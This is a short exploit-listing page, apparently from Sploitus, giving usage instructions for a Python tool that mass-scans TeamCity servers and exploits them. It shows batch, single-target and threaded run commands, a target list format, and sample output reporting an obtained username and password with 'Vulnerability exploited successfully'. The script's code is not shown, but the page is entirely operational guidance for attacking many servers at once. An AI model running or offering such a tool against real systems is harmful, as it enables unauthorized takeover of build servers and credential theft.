Share
## https://sploitus.com/exploit?id=ECCC9435-7CFF-5C9D-81A7-CDC631CAB58F
**Bash Command Examples**
**Batch Scanning**
```
python teamcity_scan.py -f targets.txt -o results.txt
```
**Single Target**
```
python teamcity_scan.py -u http://target.com:8111 -o result.txt
```
**Specify Thread Count**
```
python teamcity_scan.py -f urls.txt -t 20 -o vuln.txt
```
**Target File Format (targets.txt):**
```
text
http://192.168.1.100:8111
https://teamcity.example.com
10.0.0.1:8111
example.com
```
**Output File Format (results.txt):**
```
text
Target: http://192.168.1.100:8111
Username: TeamCityUser1234
Password: TeamCity@2023
Login URL: http://192.168.1.100:8111/login.html
Status: Vulnerability exploited successfully
```